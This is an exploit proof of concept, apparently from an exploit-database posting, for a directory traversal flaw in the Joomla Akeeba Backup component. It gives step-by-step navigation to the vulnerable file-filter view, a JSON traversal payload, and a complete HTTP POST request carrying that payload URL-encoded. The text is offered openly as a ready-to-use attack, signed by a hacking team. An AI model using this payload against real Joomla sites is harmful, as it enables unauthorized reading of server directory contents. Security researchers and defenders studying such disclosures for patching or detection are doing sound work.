# Exploit Title: Joomla Component Akeeba Backup 5.2.5 - Directory Traversal
# Date: 2017-03-07
# Home : https://extensions.joomla.org/extensions/extension/access-a-security/site-security/akeeba-backup/
# Version :  Akeeba Backup Core 5.3.0.b1 (2017-02-22) 
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : https://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam

 
POC :
1)Include and Exclude Information Section
2)Click on Files and Directories Exclusion
3)Subdirectories
4)Post action Parameter Encode as Url : {"root":"[SITEROOT]","node":"../../../../../../../","verb":"list"} 

Request : 

POST /joomla/administrator/index.php?option=com_akeeba&view=FileFilters&task=ajax HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.11/joomla/administrator/index.php?option=com_akeeba&view=FileFilters
Content-Length: 154
Cookie: 8924dd79f450c03ec0748f316908b847=vod11einhb2gaelq1um1jsje66
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=%7b%22%72%6f%6f%74%22%3a%22%5b%53%49%54%45%52%4f%4f%54%5d%22%2c%22%6e%6f%64%65%22%3a%22%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%22%2c%22%76%65%72%62%22%3a%22%6c%69%73%74%22%7d&_cacheBustingJunk=0.04

 
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers